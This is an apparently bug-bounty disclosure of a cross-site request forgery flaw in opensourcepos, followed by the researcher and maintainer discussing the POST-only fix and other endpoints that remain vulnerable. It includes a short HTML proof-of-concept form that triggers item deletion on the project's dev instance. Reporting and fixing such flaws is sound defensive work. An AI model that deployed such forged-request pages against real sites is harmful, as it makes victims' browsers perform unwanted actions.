Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021


Description

You have not set any CSRF protection for receivings/delete_item/{item_id} endpoint.

Proof of Concept

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the opensourcepos team and are waiting to hear back 22 days ago
We have contacted a member of the opensourcepos team and are waiting to hear back 22 days ago
jekkos
22 days ago

The fix should include this protection. The method is POST only now.

jekkos
22 days ago

https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8

amammad
22 days ago

Researcher


I tested this dev.opensourcepos.org

Is this instance still vulnerable ?

amammad
22 days ago

Researcher


I test this endpoint and it is still in get :

/sales/complete

and vulnerable to CSRF

jekkos
22 days ago

It might have another build deployed now

jekkos
22 days ago

I'm redeploying.. you can retry in 10mins

amammad
22 days ago

Researcher


as I said, I test again after at now and still this endpoint vulnerable to CSRF

/receivings/complete

because accept GET method besides POST

amammad
22 days ago

Researcher


I test receivings/delete_item/{id} and it is OK, jekkos.

19 days ago

OK great thanks!

opensourcepos/opensourcepos maintainer validated this vulnerability 19 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on e8f27f 18 days ago
jekkos has been awarded the fix bounty